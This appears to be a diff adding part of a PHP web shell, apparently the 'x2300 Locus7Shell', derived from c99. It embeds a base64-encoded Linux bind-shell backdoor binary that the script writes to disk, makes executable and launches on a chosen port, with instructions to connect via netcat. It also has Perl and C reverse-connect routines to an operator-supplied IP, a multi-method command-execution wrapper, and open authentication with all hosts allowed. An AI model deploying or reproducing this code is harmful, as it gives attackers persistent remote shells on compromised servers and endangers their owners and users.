+$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+//EoW
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+//Start Enumerate function
+//function ENUMERATE()
+
+$hostname_x=php_uname(n);
+$itshome = getcwd();
+$itshome = str_replace("/home/","~",$itshome);
+$itshome = str_replace("/public_html","/x2300.php",$itshome);
+$enumerate = "http://".$hostname_x."/".$itshome."";
+
+//End Enumerate function
+
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.0a beta"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "<a href=\"http://locus7s.com\">x2300 Locus7Shell v.".$shver."</a>: access denied"; 
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server 
+$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server 
+
